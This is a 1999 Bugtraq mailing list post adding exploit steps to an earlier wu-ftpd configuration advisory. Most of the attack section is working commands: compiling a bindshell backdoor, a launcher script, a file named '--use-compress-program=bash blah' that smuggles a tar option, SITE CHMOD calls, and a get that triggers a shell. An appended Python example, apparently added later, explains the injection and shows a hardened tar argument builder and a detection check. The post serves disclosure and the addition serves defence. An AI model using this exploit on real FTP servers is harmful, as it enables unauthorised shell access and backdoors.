Bugtraq mailing list archives
More details on the WU-FTPD configuration vulnerability.
From: suid () SUID KG (suid)
Date: Tue, 21 Dec 1999 23:10:56 +1100
Good evening all,

I have noticed that in my original Bugtraq posting/paper I mentioned the possibility of executing arbitrary code if you actually have a valid FTP only account on a system, but did not include specific info on this. I realise now that this information is more relevant than the anonymous FTP exploit as it is the default configuration and many, many people give users accounts on this kind of setup believing it to be `secure'.

Please find below an addendum to my paper (http://www.suid.kg/advisories/001.txt)

You can find this on the web with the rest of my stuff at the new location http://www.suid.kg/ .

Merry Xmas,

suid () suid kg

---

suid () suid kg - an addendum to wu-ftpd configuration vulnerability exploit information

Background:

In the initial advisory I mentioned that users with valid ftp access only accounts may also execute arbitrary code. I did not however include exploit information for this. This information is now found below.

Exploit Information:

With a valid FTP account only the server, the difficulty goes right down. You also have the added benefit of not being stuck in a chroot() environment at the end (by default). Local exploit time.

The exploit goes along much the same lines as the anonymous FTP exploit does:

Create a backdoor, using bindshell from our previous example:

$ gcc bindshell.c -o b -static

If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can use the following script example.

Create a script to exec the desired commands:

$ cat > blah
#!/bin/bash
./b &
^D

Now create empty file "--use-compress-program=bash blah"

$ > "--use-compress-program=bash blah"

FTP to your target, login with your username/password.

Upload your 3 files:

ftp> put b
ftp> put blah
ftp> put "--use-compress-program=bash blah"

Do a SITE CHMOD for b and blah:

ftp> quote SITE CHMOD 0755 b
ftp> quote SITE CHMOD 0755 blah

Now get your file:

ftp> get "--use-compress-program=bash blah".tar

That's all there is to it.
You now should have a shell on whatever port you specified. Merry Xmas!
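The mechanism the post relies on is argument injection: the requested name is handed to tar as a bare argument, so a name beginning with "--" is parsed as a tar option rather than a file. The following is an added example, not the post's or wu-ftpd's code, showing that parse next to the structural fix (a "--" terminator plus a "./" prefix, with plain-name validation); classify_argv is an assumed stand-in for getopt_long-style option parsing.

```python
# Added example (not wu-ftpd's code, not from the original post): why the
# file name above becomes a tar option, and the structural fix a server
# doing on-the-fly tar conversion should apply. classify_argv is a
# hypothetical stand-in for getopt_long-style option parsing.

# Constructed sample input: the file name used in the post above.
OPTION_LIKE_NAME = "--use-compress-program=bash blah"


def classify_argv(argv):
    """Split argv[1:] into (options, operands) the way getopt_long does.

    Anything starting with '-' before the first bare '--' is an option; a
    lone '-' (stdin/stdout) is an operand; everything after '--' is an operand.
    """
    options, operands = [], []
    end_of_options = False
    for arg in argv[1:]:
        if end_of_options or arg == "-" or not arg.startswith("-"):
            operands.append(arg)
        elif arg == "--":
            end_of_options = True
        else:
            options.append(arg)
    return options, operands


def is_option_like(name):
    """Detection check for logs/uploads: would tar parse this name as an option?"""
    return name.startswith("-") and name != "-"


def is_safe_name(name):
    """Plain file names only: no empty names, NULs, separators or '.'/'..'."""
    return (bool(name) and "\0" not in name and "/" not in name
            and name not in (".", ".."))


def naive_tar_argv(name):
    """The unsafe pattern: the user-controlled name is appended as-is."""
    return ["tar", "-cf", "-", name]


def safe_tar_argv(name):
    """Hardened builder: validate, then end option parsing with '--' and
    anchor the operand with './' so no name can ever reach tar as a flag."""
    if not is_safe_name(name):
        raise ValueError(f"rejected file name: {name!r}")
    return ["tar", "-cf", "-", "--", "./" + name]
```

Feeding the post's file name through naive_tar_argv yields it as a second tar option; through safe_tar_argv it is only ever an operand, and is_option_like is the cheap check to log or refuse such names at upload time.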
